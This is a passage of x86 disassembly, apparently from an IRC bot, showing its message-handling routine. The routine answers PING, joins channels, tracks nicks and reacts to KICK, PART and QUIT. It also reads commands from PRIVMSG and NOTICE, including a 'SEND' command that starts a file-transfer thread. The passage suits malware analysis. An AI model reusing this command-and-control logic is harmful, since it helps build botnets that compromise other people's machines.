var_2B44 = byte ptr -2B44h
var_2AC4 = dword ptr -2AC4h
var_2AC0 = dword ptr -2AC0h
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB0 = byte ptr -2AB0h
var_2998 = byte ptr -2998h
var_2918 = dword ptr -2918h
var_2914 = dword ptr -2914h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = byte ptr -2900h
var_2880 = byte ptr -2880h
var_2780 = byte ptr -2780h
var_2680 = dword ptr -2680h
var_267C = dword ptr -267Ch
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = byte ptr -2658h
var_25D8 = byte ptr -25D8h
var_24D8 = byte ptr -24D8h
var_23D8 = dword ptr -23D8h
var_23D4 = dword ptr -23D4h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = byte ptr -23B0h
var_2330 = byte ptr -2330h
var_22B0 = byte ptr -22B0h
var_2230 = dword ptr -2230h
var_222C = dword ptr -222Ch
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = byte ptr -221Ch
var_219C = byte ptr -219Ch
var_211C = byte ptr -211Ch
var_209C = dword ptr -209Ch
var_2098 = dword ptr -2098h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = byte ptr -2088h
var_2008 = byte ptr -2008h
var_1F88 = byte ptr -1F88h
var_1F08 = dword ptr -1F08h
var_1F04 = dword ptr -1F04h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = byte ptr -1EF4h
var_1DF4 = byte ptr -1DF4h
var_1D74 = dword ptr -1D74h
var_1D6C = dword ptr -1D6Ch
var_1D68 = dword ptr -1D68h
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D50 = byte ptr -1D50h
var_1D3C = byte ptr -1D3Ch
var_1C38 = byte ptr -1C38h
var_1BB4 = dword ptr -1BB4h
var_1BB0 = dword ptr -1BB0h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1B9C = byte ptr -1B9Ch
var_1B88 = byte ptr -1B88h
var_1A84 = byte ptr -1A84h
var_1A04 = dword ptr -1A04h
var_1A00 = dword ptr -1A00h
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = byte ptr -19ECh
var_196C = byte ptr -196Ch
var_192C = byte ptr -192Ch
var_182C = dword ptr -182Ch
var_1828 = dword ptr -1828h
var_181C = dword ptr -181Ch
var_1818 = dword ptr -1818h
var_1814 = dword ptr -1814h
var_1810 = byte ptr -1810h
var_17D8 = byte ptr -17D8h
var_17A0 = byte ptr -17A0h
var_1784 = byte ptr -1784h
var_1780 = byte ptr -1780h
var_1700 = byte ptr -1700h
var_16C0 = byte ptr -16C0h
var_1630 = dword ptr -1630h
var_162C = dword ptr -162Ch
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = byte ptr -161Ch
var_159C = byte ptr -159Ch
var_151C = dword ptr -151Ch
var_1518 = dword ptr -1518h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = byte ptr -150Ch
var_14FC = byte ptr -14FCh
var_147C = byte ptr -147Ch
var_13FC = dword ptr -13FCh
var_13F4 = dword ptr -13F4h
var_13F0 = dword ptr -13F0h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = byte ptr -13DCh
var_135C = byte ptr -135Ch
var_12DC = byte ptr -12DCh
var_125C = dword ptr -125Ch
var_1258 = dword ptr -1258h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_1238 = byte ptr -1238h
var_11B8 = byte ptr -11B8h
var_1138 = dword ptr -1138h
var_1134 = dword ptr -1134h
var_1130 = dword ptr -1130h
var_1128 = dword ptr -1128h
var_1124 = dword ptr -1124h
var_1120 = dword ptr -1120h
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_1094 = byte ptr -1094h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1004 = dword ptr -1004h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = byte ptr -0FF0h
var_F70 = dword ptr -0F70h
var_F6C = dword ptr -0F6Ch
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = byte ptr -0F5Ch
var_EDC = dword ptr -0EDCh
var_ED8 = dword ptr -0ED8h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = byte ptr -0EC8h
var_E48 = dword ptr -0E48h
var_E44 = dword ptr -0E44h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = byte ptr -0E38h
var_DB8 = byte ptr -0DB8h
var_D98 = byte ptr -0D98h
var_D88 = dword ptr -0D88h
var_D84 = byte ptr -0D84h
var_D04 = byte ptr -0D04h
var_C84 = dword ptr -0C84h
var_C80 = dword ptr -0C80h
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = byte ptr -0C5Ch
var_BDC = dword ptr -0BDCh
var_BD8 = dword ptr -0BD8h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = byte ptr -0BCCh
var_B4C = dword ptr -0B4Ch
var_B48 = dword ptr -0B48h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = byte ptr -0B34h
var_AB4 = dword ptr -0AB4h
var_AB0 = dword ptr -0AB0h
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = byte ptr -0A9Ch
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_984 = word ptr -984h
var_980 = dword ptr -980h
var_978 = dword ptr -978h
var_974 = dword ptr -974h
var_970 = dword ptr -970h
var_968 = byte ptr -968h
var_907 = byte ptr -907h
var_906 = byte ptr -906h
var_904 = byte ptr -904h
var_903 = byte ptr -903h
var_8FA = byte ptr -8FAh
var_8F8 = byte ptr -8F8h
var_8F6 = byte ptr -8F6h
var_8F5 = byte ptr -8F5h
var_868 = byte ptr -868h
var_858 = byte ptr -858h
var_7D8 = byte ptr -7D8h
var_758 = dword ptr -758h
var_754 = dword ptr -754h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_698 = dword ptr -698h
var_690 = dword ptr -690h
var_68C = dword ptr -68Ch
var_688 = dword ptr -688h
var_680 = dword ptr -680h
var_67C = dword ptr -67Ch
var_678 = dword ptr -678h
var_670 = dword ptr -670h
var_644 = dword ptr -644h
var_640 = word ptr -640h
var_62C = dword ptr -62Ch
var_628 = byte ptr -628h
var_5A8 = byte ptr -5A8h
var_598 = dword ptr -598h
var_594 = dword ptr -594h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_57C = dword ptr -57Ch
var_578 = byte ptr -578h
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E0 = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
Drive = byte ptr -4D0h
var_4C4 = byte ptr -4C4h
var_48C = byte ptr -48Ch
var_47C = byte ptr -47Ch
var_3FC = byte ptr -3FCh
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
Dest = byte ptr -340h
var_324 = word ptr -324h
var_322 = word ptr -322h
var_320 = dword ptr -320h
var_314 = byte ptr -314h
Count = dword ptr -310h
var_304 = byte ptr -304h
var_300 = byte ptr -300h
var_2FC = dword ptr -2FCh
var_2F0 = byte ptr -2F0h
var_2EC = byte ptr -2ECh
var_2EB = byte ptr -2EBh
var_2EA = byte ptr -2EAh
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
Dst = byte ptr -2D0h
var_D0 = byte ptr -0D0h
File = dword ptr -0B8h
SubStr = byte ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_A6 = byte ptr -0A6h
Str2 = dword ptr -0A4h
Args = byte ptr -0A0h
Format = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Source = dword ptr 18h
arg_14 = dword ptr 1Ch
Str1 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov eax, 5D90h
lea ebp, [esp-4Ch]
call __alloca_probe
push ebx
push esi
xor ebx, ebx
mov esi, 200h
push esi ; Size
lea eax, [ebp+4Ch+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+4Ch+var_20], 3
mov [ebp+4Ch+var_1C], ebx
mov [ebp+4Ch+var_14], ebx
mov [ebp+4Ch+var_C], ebx
mov [ebp+4Ch+var_4], ebx
mov [ebp+4Ch+var_8], ebx
call _memset
push 1Bh ; Count
push [ebp+4Ch+Source] ; Source
lea eax, [ebp+4Ch+Dest]
push eax ; Dest
call _strncpy
add esp, 18h
cmp [ebp+4Ch+arg_0], ebx
jnz short loc_4027AA
xor eax, eax
inc eax
jmp loc_402B96
; ---------------------------------------------------------------------------
loc_4027AA: ; CODE XREF: sub_40274D+53�j
push edi
push esi ; Size
lea eax, [ebp+4Ch+var_4590]
push ebx ; Val
push eax ; Dst
call _memset
mov esi, 1FFh
push esi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_4590]
push eax ; Dest
call _strncpy
lea eax, [ebp+4Ch+var_4590]
push offset SubStr ; " :"
push eax ; Str
call _strstr
mov [ebp+4Ch+var_18], eax
push esi ; Count
lea eax, [ebp+4Ch+var_4590]
push eax ; Source
lea eax, [ebp+4Ch+Str]
push eax ; Dest
call _strncpy
mov esi, offset asc_42FE58 ; " "
lea eax, [ebp+4Ch+Str]
push esi ; Delim
push eax ; Str
call _strtok
xor edi, edi
add esp, 34h
mov [ebp+4Ch+Str2], eax
inc edi
loc_402811: ; CODE XREF: sub_40274D+D5�j
push esi ; Delim
push ebx ; Str
call _strtok
mov [ebp+edi*4+4Ch+Str2], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_402811
mov esi, [ebp+4Ch+Str2]
cmp esi, ebx
jz loc_402B92
cmp dword ptr [ebp+4Ch+Args], ebx
jz loc_402B92
push 100h ; Size
lea eax, [ebp+4Ch+var_968]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push 1Fh
pop edx
loc_402850: ; CODE XREF: sub_40274D+131�j
lea ecx, [ebp+edx*4+4Ch+Str2]
mov eax, [ecx]
cmp eax, ebx
jz short loc_40287D
cmp byte ptr [eax], 2Dh
jnz short loc_402880
cmp [eax+2], bl
jnz short loc_402880
movsx esi, byte ptr [eax+1]
mov [ebp+esi+4Ch+var_968], 1
mov [eax], bl
mov [eax+1], bl
mov [ecx], ebx
mov esi, [ebp+4Ch+Str2]
mov [eax+2], bl
loc_40287D: ; CODE XREF: sub_40274D+10B�j
dec edx
jns short loc_402850
loc_402880: ; CODE XREF: sub_40274D+110�j
; sub_40274D+115�j
xor edi, edi
inc edi
cmp [ebp+4Ch+var_8F5], bl
jz short loc_40288E
mov [ebp+4Ch+var_C], edi
loc_40288E: ; CODE XREF: sub_40274D+13C�j
cmp [ebp+4Ch+var_8FA], bl
jz short loc_40289C
mov [ebp+4Ch+var_C], ebx
mov [ebp+4Ch+var_4], edi
loc_40289C: ; CODE XREF: sub_40274D+147�j
cmp byte ptr [esi], 0Ah
jz short loc_4028D6
push 7Fh ; Count
lea eax, [ebp+4Ch+var_E38]
push esi ; Source
push eax ; Dest
call _strncpy
push 17h ; Count
lea eax, [esi+1]
push eax ; Source
lea eax, [ebp+4Ch+var_D0]
push eax ; Dest
call _strncpy
lea eax, [ebp+4Ch+var_D0]
push offset Delim ; "!"
push eax ; Str
call _strtok
add esp, 20h
loc_4028D6: ; CODE XREF: sub_40274D+152�j
push esi ; Str2
push offset Str1 ; "PING"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402922
push dword ptr [ebp+4Ch+Args] ; Args
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
mov eax, [ebp+4Ch+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz short loc_40291B
push [ebp+4Ch+arg_C]
push [ebp+4Ch+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
add esp, 10h
loc_40291B: ; CODE XREF: sub_40274D+1B6�j
; sub_40274D+224�j ...
mov eax, edi
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_402922: ; CODE XREF: sub_40274D+198�j
mov esi, dword ptr [ebp+4Ch+Args]
push esi ; Str2
push offset a001 ; "001"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A21D
push esi ; Str2
push offset a005 ; "005"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A21D
push esi ; Str2
push offset a302_0 ; "302"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402987
push offset a@ ; "@"
push [ebp+4Ch+var_98] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40291B
push 9Fh ; Count
inc eax
push eax ; Source
push [ebp+4Ch+arg_1C] ; Dest
call _strncpy
add esp, 0Ch
jmp short loc_40291B
; ---------------------------------------------------------------------------
loc_402987: ; CODE XREF: sub_40274D+211�j
push esi ; Str2
push offset a433 ; "433"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4029C5
push ebx ; Str1
push dword_43C098 ; int
push dword_43C094 ; int
push [ebp+4Ch+Source] ; Dest
call sub_40AB83
push [ebp+4Ch+Source] ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
add esp, 1Ch
jmp loc_40291B
; ---------------------------------------------------------------------------
loc_4029C5: ; CODE XREF: sub_40274D+249�j
mov esi, [ebp+4Ch+Str1]
mov [ebp+4Ch+var_24], 3
mov edi, 80h
loc_4029D4: ; CODE XREF: sub_40274D+2A6�j
lea eax, [ebp+4Ch+var_E38]
push eax ; Str2
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4029EE
mov [ebp+4Ch+var_14], 1
loc_4029EE: ; CODE XREF: sub_40274D+298�j
add esi, edi
dec [ebp+4Ch+var_24]
jnz short loc_4029D4
mov esi, dword ptr [ebp+4Ch+Args]
push esi ; Str2
push offset aKick ; "KICK"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402AC4
mov esi, [ebp+4Ch+Str1]
mov [ebp+4Ch+arg_0], 3
loc_402A17: ; CODE XREF: sub_40274D+343�j
cmp [esi], bl
jz short loc_402A8B
push 7Fh ; Count
lea eax, [ebp+4Ch+var_E38]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+4Ch+var_98], ebx
jz short loc_402A8B
push [ebp+4Ch+var_98] ; Str2
lea eax, [ebp+4Ch+var_D0]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402A8B
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42FDE8 ; "-"
push eax ; Dest
mov [esi], bl
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax
lea eax, [ebp+4Ch+var_D0]
push eax ; Args
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
add esp, 20h
loc_402A8B: ; CODE XREF: sub_40274D+2CC�j
; sub_40274D+2E3�j ...
add esi, edi
dec [ebp+4Ch+arg_0]
jnz short loc_402A17
push [ebp+4Ch+var_98] ; Str2
push [ebp+4Ch+Source] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402B92
push [ebp+4Ch+arg_C]
mov eax, [ebp+4Ch+arg_20]
push [ebp+4Ch+arg_8] ; Args
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_402AB7: ; CODE XREF: sub_40274D+58A�j
; sub_40274D+7FC�j ...
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
jmp loc_404D0F
; ---------------------------------------------------------------------------
loc_402AC4: ; CODE XREF: sub_40274D+2BA�j
push esi ; Str2
push offset aNick ; "NICK"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402BFD
mov eax, [ebp+4Ch+Format]
mov esi, [ebp+4Ch+Str1]
inc eax
mov [ebp+4Ch+arg_0], eax
mov [ebp+4Ch+var_20], 3
loc_402AEA: ; CODE XREF: sub_40274D+3EF�j
lea eax, [ebp+4Ch+var_E38]
push eax ; Str2
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402B37
lea eax, [ebp+4Ch+var_E38]
push 21h ; Val
push eax ; Str
call _strchr
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+4Ch+var_14], eax
jz short loc_402B37
push [ebp+4Ch+arg_0] ; Source
lea edi, [esi+2]
lea eax, [edi-1]
push eax ; Dest
mov byte ptr [esi], 3Ah
call _strcpy
push [ebp+4Ch+var_14] ; Source
push edi ; Dest
call _strcat
add esp, 10h
mov edi, 80h
loc_402B37: ; CODE XREF: sub_40274D+3AE�j
; sub_40274D+3C5�j
add esi, edi
dec [ebp+4Ch+var_20]
jnz short loc_402AEA
cmp [ebp+4Ch+arg_0], ebx
jz short loc_402B92
push [ebp+4Ch+Source] ; Str2
lea eax, [ebp+4Ch+var_D0]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402B6A
push 0Fh ; Count
push [ebp+4Ch+arg_0] ; Source
push [ebp+4Ch+Source] ; Dest
call _strncpy
jmp loc_404199
; ---------------------------------------------------------------------------
loc_402B6A: ; CODE XREF: sub_40274D+409�j
mov edi, [ebp+4Ch+Str1]
xor esi, esi
loc_402B6F: ; CODE XREF: sub_40274D+443�j
cmp [edi], bl
jz short loc_402B86
lea eax, [ebp+4Ch+var_E38]
push eax ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_402B9D
loc_402B86: ; CODE XREF: sub_40274D+424�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402B6F
loc_402B92: ; CODE XREF: sub_40274D+DC�j
; sub_40274D+E5�j ...
xor eax, eax
inc eax
loc_402B95: ; CODE XREF: sub_40274D+1D0�j
; sub_40274D+222F�j ...
pop edi
loc_402B96: ; CODE XREF: sub_40274D+58�j
pop esi
pop ebx
add ebp, 4Ch
leave
retn
; ---------------------------------------------------------------------------
loc_402B9D: ; CODE XREF: sub_40274D+437�j
lea eax, [ebp+4Ch+var_E38]
push 21h ; Val
push eax ; Str
call _strchr
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+4Ch+var_20], eax
jz short loc_402B92
push eax ; Str
call _strlen
push [ebp+4Ch+arg_0] ; Str
mov edi, eax
call _strlen
add edi, eax
cmp edi, 7Eh
pop ecx
pop ecx
ja short loc_402B92
push [ebp+4Ch+var_20]
shl esi, 7
push [ebp+4Ch+arg_0]
add esi, [ebp+4Ch+Str1]
push offset aSS_1 ; ":%s%s"
push esi ; Dest
call _sprintf
push ebx ; int
push ebx ; int
lea eax, [ebp+4Ch+var_45F4]
push eax ; int
push [ebp+4Ch+arg_8] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 24h
jmp short loc_402B92
; ---------------------------------------------------------------------------
loc_402BFD: ; CODE XREF: sub_40274D+386�j
push esi ; Str2
push offset aPart ; "PART"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_402C1F
push esi ; Str2
push offset aQuit ; "QUIT"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402C43
loc_402C1F: ; CODE XREF: sub_40274D+4BF�j
mov edi, [ebp+4Ch+Str1]
xor esi, esi
loc_402C24: ; CODE XREF: sub_40274D+4F4�j
cmp [edi], bl
jz short loc_402C37
push [ebp+4Ch+Str2] ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_402C81
loc_402C37: ; CODE XREF: sub_40274D+4D9�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402C24
loc_402C43: ; CODE XREF: sub_40274D+4D0�j
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a353 ; "353"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402CDC
push [ebp+4Ch+var_94] ; Str2
push [ebp+4Ch+arg_8] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402C74
mov eax, [ebp+4Ch+arg_20]
mov dword ptr [eax], 1
loc_402C74: ; CODE XREF: sub_40274D+51C�j
push [ebp+4Ch+var_94]
push offset unk_42FD94
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_402C81: ; CODE XREF: sub_40274D+4E8�j
mov eax, [ebp+4Ch+Str1]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42FD70 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
push dword ptr [ebp+4Ch+Args] ; Str2
push offset aPart ; "PART"
call _strcmp
add esp, 18h
test eax, eax
jnz loc_402B92
lea eax, [ebp+4Ch+Dst]
push eax
mov eax, [ebp+4Ch+Str2]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_402AB7
; ---------------------------------------------------------------------------
loc_402CDC: ; CODE XREF: sub_40274D+507�j
push dword ptr [ebp+4Ch+Args] ; Str2
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
mov edi, offset Str ; "NOTICE"
jz short loc_402D27
push dword ptr [ebp+4Ch+Args] ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_402D27
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a332 ; "332"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_404979
cmp dword_43C084, ebx
jz loc_404979
loc_402D27: ; CODE XREF: sub_40274D+5A6�j
; sub_40274D+5B5�j
push dword ptr [ebp+4Ch+Args] ; Str2
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_402E83
push dword ptr [ebp+4Ch+Args] ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_402E83
mov eax, [ebp+4Ch+var_98]
inc [ebp+4Ch+var_94]
mov [ebp+4Ch+var_20], 4
mov [ebp+4Ch+Format], eax
loc_402D5D: ; CODE XREF: sub_40274D+7D7�j
; sub_40274D+810�j ...
mov esi, [ebp+4Ch+var_20]
shl esi, 2
lea edi, [ebp+esi+4Ch+Str2]
mov eax, [edi]
push eax ; Str2
push offset dword_42FD64 ; Str1
mov [ebp+4Ch+var_10], eax
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4030EC
push dword ptr [ebp+esi+4Ch+Args] ; Str2
push offset aSend_0 ; "SEND"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402FC0
cmp [ebp+4Ch+var_14], ebx
jz loc_402F9C
push [ebp+esi+4Ch+Format]
mov edi, offset aS ; "%s"
lea eax, [ebp+4Ch+var_1B88]
push edi ; Format
push eax ; Dest
call _sprintf
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+var_1B9C]
push edi ; Format
push eax ; Dest
call _sprintf
push [ebp+esi+4Ch+var_94] ; Str
call j__atol
mov [ebp+4Ch+var_1A04], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1BA4], eax
push 7Fh ; Count
lea eax, [ebp+4Ch+var_D0]
push eax ; Source
lea eax, [ebp+4Ch+var_1A84]
push eax ; Dest
call _strncpy
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_19FC], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_19F8], eax
lea eax, [ebp+4Ch+var_1A84]
push eax
lea eax, [ebp+4Ch+var_1B88]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42FD2C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 1Ah ; int
push eax ; Source
call sub_40AE85
add esp, 44h
mov [ebp+4Ch+var_1A00], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1BA4]
push eax
push offset sub_418CEA
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1A00]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz loc_402F8F
loc_402E72: ; CODE XREF: sub_40274D+7473�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42FCF0
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_402E83: ; CODE XREF: sub_40274D+5E7�j
; sub_40274D+5FA�j
push dword ptr [ebp+4Ch+Args] ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_402E99
mov [ebp+4Ch+var_4], 1
loc_402E99: ; CODE XREF: sub_40274D+743�j
cmp [ebp+4Ch+Format], ebx
jz loc_402B92
push offset asc_42FCEC ; "#"
push [ebp+4Ch+Format] ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_402EBA
cmp [ebp+4Ch+var_4], ebx
jz short loc_402EC3
loc_402EBA: ; CODE XREF: sub_40274D+766�j
lea eax, [ebp+4Ch+var_D0]
mov [ebp+4Ch+Format], eax
loc_402EC3: ; CODE XREF: sub_40274D+76B�j
cmp [ebp+4Ch+var_98], ebx
jz loc_402B92
inc [ebp+4Ch+var_98]
jz short loc_402F01
cmp [ebp+4Ch+Source], ebx
jz short loc_402F01
lea eax, [ebp+4Ch+Dest]
push eax ; Str
call _strlen
push eax ; MaxCount
push [ebp+4Ch+var_98] ; Str2
lea eax, [ebp+4Ch+Dest]
push eax ; Str1
call _strncmp
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+4Ch+var_20], eax
jmp short loc_402F04
; ---------------------------------------------------------------------------
loc_402F01: ; CODE XREF: sub_40274D+782�j
; sub_40274D+787�j
mov eax, [ebp+4Ch+var_20]
loc_402F04: ; CODE XREF: sub_40274D+7B2�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+4Ch+Str2]
cmp edi, ebx
jz loc_402B92
push edi ; Str2
push offset dword_42FCE0 ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402D5D
mov ecx, [ebp+4Ch+Format]
cmp byte ptr [ecx], 23h
jz short loc_402F4E
mov eax, dword_4D1FE0
mov eax, off_43C160[eax*4]
cmp [eax], bl
